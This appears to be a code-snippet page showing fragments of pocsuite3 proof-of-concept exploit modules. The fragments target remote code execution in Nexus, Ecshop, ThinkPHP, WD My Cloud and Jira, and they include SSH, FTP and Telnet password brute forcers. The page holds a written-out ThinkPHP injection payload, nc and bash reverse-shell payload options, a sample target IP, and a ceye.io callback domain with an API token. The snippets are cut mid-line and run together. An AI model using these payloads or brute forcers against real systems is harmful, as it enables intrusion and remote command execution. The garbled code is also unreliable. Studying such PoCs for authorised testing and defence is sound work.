How to use the pocsuite3.api.VUL_TYPE function in pocsuite3
To help you get started, we’ve selected a few pocsuite3 examples, based on popular ways it is used in public projects.
Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.
shadowsock5 / Poc / Nexus / Nexus_CVE_2018_16621.py View on Github 
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
'''
CVE-2018-16621: Nexus 3 EL injection
Admin access is required
'''
class Nexus3_2018_16621_EL_INJECTION_POC(POCBase):
vulID = 'Nexus3-CVE-2018-16621'
appName = 'Nexus3'
appVersion = 'Nexus Repository Manager OSS/Pro <=3.13.0'
category = POC_CATEGORY.EXPLOITS.REMOTE
vulType = VUL_TYPE.CODE_EXECUTION
vulDate = '2018-10-18' # 漏洞公开的时间,不知道就写今天
author = 'shadowsock5' # PoC作者的大名
createDate = '2020-04-03' # 编写 PoC 的日期
updateDate = '2020-04-07' # PoC 更新的时间,默认和编写时间一样
references = ['https://support.sonatype.com/hc/en-us/articles/360010789153-CVE-2018-16621-Nexus-Repository-Manager-Java-Injection-October-17-2018'] # 漏洞地址来源,0day不用写
name = 'Nexus3 EL injection' # PoC 名称
install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
cvss = u"中危"
# 使用随机字符串作为banner,计算数字之后返回
ran1 = random.randint(1,100)
ran2 = random.randint(100,200)
ran_sum = ran1 * ran2output.success(result)
else:
output.fail()
return output
'''
CVE-2019-5475/CVE-2019-15588
需要管理员权限
'''
class Nexus2_RCE_POC(POCBase):
vulID = 'Nexus2-CVE-2019-5475_15588'
appName = 'Nexus2'
appVersion = 'Nexus Repository Manager OSS/Pro <= 2.14.13'
category = POC_CATEGORY.EXPLOITS.REMOTE
vulType = VUL_TYPE.CODE_EXECUTION
vulDate = '2019-09-09' # 漏洞公开的时间,不知道就写今天
author = 'shadowsock5' # PoC作者的大名
createDate = '2019-09-13' # 编写 PoC 的日期
updateDate = '2020-02-17' # PoC 更新的时间,默认和编写时间一样
references = ['https://hackerone.com/reports/654888'] # 漏洞地址来源,0day不用写
name = 'Nexus2 RCE' # PoC 名称
appPowerLink = ['https://support.sonatype.com/hc/en-us'] # 漏洞厂商主页地址
desc = '''
Nexus Repository Manager 2 RCE
''' # 漏洞简要描述
install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
cvss = u"中危"
# 使用随机字符串作为banner,通过ceye的接口判断命令是否被执行
DOMAIN = 'wvg689.ceye.io'from pocsuite3.lib.core.threads import run_threads
class DemoPOC(POCBase):
vulID = '62522'
version = '3'
author = ['seebug']
vulDate = '2013-11-21'
createDate = '2013-11-21'
updateDate = '2013-11-21'
references = ['http://sebug.net/vuldb/ssvid-62522']
name = 'FTP 弱密码'
appPowerLink = ''
appName = 'ftp'
appVersion = 'All'
vulType = VUL_TYPE.WEAK_PASSWORD
desc = '''ftp 存在弱密码,导致攻击者可连接进行文件管理进行恶意操作'''
samples = ['']
category = POC_CATEGORY.TOOLS.CRACK
protocol = POC_CATEGORY.PROTOCOL.FTP
def _verify(self):
result = {}
host = self.getg_option("rhost")
port = self.getg_option("rport") or 21
ftp_burst(host, port)
if not result_queue.empty():
username, password = result_queue.get()
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Username'] = usernamefrom pocsuite3.lib.utils import get_middle_text
class DemoPOC(POCBase):
vulID = '97343' # ssvid
version = '3.0'
author = ['seebug']
vulDate = '2018-06-14'
createDate = '2018-06-14'
updateDate = '2018-06-14'
references = ['https://www.seebug.org/vuldb/ssvid-97343']
name = 'Ecshop 2.x/3.x Remote Code Execution'
appPowerLink = ''
appName = 'ECSHOP'
appVersion = '2.x,3.x'
vulType = VUL_TYPE.CODE_EXECUTION
desc = '''近日,Ecshop爆出全版本SQL注入及任意代码执行漏洞,受影响的版本有:Ecshop 2.x,Ecshop 3.x-3.6.0'''
samples = []
install_requires = ['']
category = POC_CATEGORY.EXPLOITS.WEBAPP
protocol = POC_CATEGORY.PROTOCOL.HTTP
pocDesc = '''在攻击模式下,可以通过command参数来指定任意命令,app_version用于选定ecshop版本'''
def _options(self):
o = OrderedDict()
o["command"] = OptString("whoami", description='攻击时自定义命令')
o["app_version"] = OptItems(['2.x', '3.x', 'Auto'], selected="Auto", description='目标版本,可自动匹配')
payload = {
"nc": REVERSE_PAYLOAD.NC,
"bash": REVERSE_PAYLOAD.BASH,
}
o["payload"] = OptDict(default=payload, selected="bash")from pocsuite3.lib.utils import random_str, generate_shellcode_list
class DemoPOC(POCBase):
vulID = '97767' # ssvid
version = '1.0'
author = ['chenghs']
vulDate = '2019-1-11'
createDate = '2019-1-11'
updateDate = '2019-1-11'
references = ['https://www.seebug.org/vuldb/ssvid-97765']
name = 'Thinkphp 5.0.x 远程代码执行漏洞'
appPowerLink = 'http://www.thinkphp.cn/'
appName = 'thinkphp'
appVersion = 'thinkphp5.0.23'
vulType = VUL_TYPE.CODE_EXECUTION
desc = '''Thinphp团队在实现框架中的核心类Requests的method方法实现了表单请求类型伪装,默认为$_POST[‘_method’]变量,却没有对$_POST[‘_method’]属性进行严格校验,可以通过变量覆盖掉Requets类的属性并结合框架特性实现对任意函数的调用达到任意代码执行的效果。'''
samples = []
category = POC_CATEGORY.EXPLOITS.WEBAPP
def _check(self, url):
flag = 'PHP Extension Build'
data = "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"
payloads = [
r"/index.php?s=captcha"
]
for payload in payloads:
vul_url = url + payload
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY
class DemoPOC(POCBase):
vulID = '97550'
version = '3'
author = ['seebug']
vulDate = '2018-09-25'
createDate = '2018-09-25'
updateDate = '2018-09-25'
references = ['https://www.seebug.org/vuldb/ssvid-97550']
name = 'Western Digital My Cloud(NAS)登录绕过导致无限制远程命令执行'
appPowerLink = 'https://www.wdc.com/en-us/'
appName = 'WD NAS 登陆绕过导致无限远程命令执行'
appVersion = ''
vulType = VUL_TYPE.CODE_EXECUTION
desc = '''
Western Digital My Cloud(NAS)登录绕过导致无限制远程命令执行
'''
samples = ['96.234.71.117:80']
category = POC_CATEGORY.EXPLOITS.REMOTE
def _options(self):
o = OrderedDict()
payload = {
"nc": REVERSE_PAYLOAD.NC,
"bash": REVERSE_PAYLOAD.BASH,
}
o["command"] = OptDict(selected="bash", default=payload)
return o
def _verify(self):7.4.x
7.5.x
7.6.x < 7.6.14
7.7.x
7.8.x
7.9.x
7.10.x
7.11.x
7.12.x
7.13.x < 7.13.5
8.0.x < 8.0.3
8.1.x < 8.1.2
8.2.x < 8.2.3
'''
category = POC_CATEGORY.EXPLOITS.REMOTE
vulType = VUL_TYPE.CODE_EXECUTION
vulDate = '2019-07-10' # 漏洞公开的时间,不知道就写今天
author = 'shadowsock5' # PoC作者的大名
createDate = '2020-02-17' # 编写 PoC 的日期
updateDate = '2020-02-17' # PoC 更新的时间,默认和编写时间一样
references = ['https://mp.weixin.qq.com/s/d2yvSyRZXpZrPcAkMqArsw'] # 漏洞地址来源,0day不用写
name = 'Jira未授权服务端模板注入' # PoC 名称
install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
cvss = u"中危"
# 使用随机字符串作为banner,通过ceye的接口判断命令是否被执行
DOMAIN = 'wvg689.ceye.io'
TOKEN = '76dce59a986eab595838f7dc74903035'
BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
'''
CVE-2020-11753: Nexus 3 groovy injection(Improper Access Controls)
Admin access is required
This is a feature removed since 3.22.0
'''
class Nexus3_2020_11753_groovy_INJECTION_POC(POCBase):
vulID = 'Nexus3-groovy-injection'
appName = 'Nexus3'
appVersion = 'Nexus Repository Manager OSS/Pro <=3.21.2(官方说是3.21.1 and 3.22.0)'
category = POC_CATEGORY.EXPLOITS.REMOTE
vulType = VUL_TYPE.CODE_EXECUTION
vulDate = '2020-04-16' # 漏洞公开的时间,不知道就写今天
author = 'shadowsock5' # PoC作者的大名
createDate = '2020-04-03' # 编写 PoC 的日期
updateDate = '2020-04-17' # PoC 更新的时间,默认和编写时间一样
references = ['https://support.sonatype.com/hc/en-us/articles/360046233714-CVE-2020-11753-Nexus-Repository-Manager-3-Improper-Access-Controls-2020-04-16'] # 漏洞地址来源,0day不用写
name = 'Nexus3 groovy injection' # PoC 名称
install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
cvss = u"高危"
def _verify(self):
result={}
vul_url = self.urlfrom pocsuite3.lib.core.threads import run_threads
class DemoPOC(POCBase):
vulID = '89688'
version = '3'
author = ['seebug']
vulDate = '2018-09-18'
createDate = '2018-09-18'
updateDate = '2018-09-18'
references = ['https://www.seebug.org/vuldb/ssvid-89688']
name = 'SSH 弱密码'
appPowerLink = ''
appName = 'ssh'
appVersion = 'All'
vulType = VUL_TYPE.WEAK_PASSWORD
desc = '''ssh 存在弱密码,导致攻击者可连接主机进行恶意操作'''
samples = ['']
install_requires = ['paramiko']
category = POC_CATEGORY.TOOLS.CRACK
protocol = POC_CATEGORY.PROTOCOL.SSH
def _verify(self):
result = {}
host = self.getg_option("rhost")
port = self.getg_option("rport") or 22
task_queue = queue.Queue()
result_queue = queue.Queue()
ssh_burst(host, port, task_queue, result_queue)
if not result_queue.empty():
username, password = result_queue.get()from pocsuite3.lib.core.threads import run_threads
class DemoPOC(POCBase):
vulID = '89687'
version = '3'
author = ['seebug']
vulDate = '2018-09-19'
createDate = '2018-09-19'
updateDate = '2018-09-19'
references = ['https://www.seebug.org/vuldb/ssvid-89687']
name = 'Telnet 弱密码'
appPowerLink = ''
appName = 'telnet'
appVersion = 'All'
vulType = VUL_TYPE.WEAK_PASSWORD
desc = '''telnet 存在弱密码,导致攻击者可登录主机进行恶意操作'''
samples = ['']
category = POC_CATEGORY.TOOLS.CRACK
protocol = POC_CATEGORY.PROTOCOL.TELENT
def _verify(self):
result = {}
host = self.getg_option("rhost")
port = self.getg_option("rport") or 23
telnet_burst(host, port)
if not result_queue.empty():
username, password = result_queue.get()
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Username'] = usernamepocsuite3
Open-sourced remote vulnerability testing framework.
Package Health Score
78 / 100Popular pocsuite3 functions
- pocsuite3.api.logger
- pocsuite3.api.logger.info
- pocsuite3.api.Output
- pocsuite3.api.POC_CATEGORY
- pocsuite3.api.POCBase
- pocsuite3.api.register_poc
- pocsuite3.api.requests
- pocsuite3.api.requests.get
- pocsuite3.api.requests.post
- pocsuite3.api.VUL_TYPE
- pocsuite3.lib.core.common.data_to_stdout
- pocsuite3.lib.core.data.conf
- pocsuite3.lib.core.data.kb
- pocsuite3.lib.core.data.logger
- pocsuite3.lib.core.data.logger.debug
- pocsuite3.lib.core.data.logger.error
- pocsuite3.lib.core.data.logger.info
- pocsuite3.lib.core.data.paths
- pocsuite3.lib.core.datatype.AttribDict
- pocsuite3.lib.request.requests.get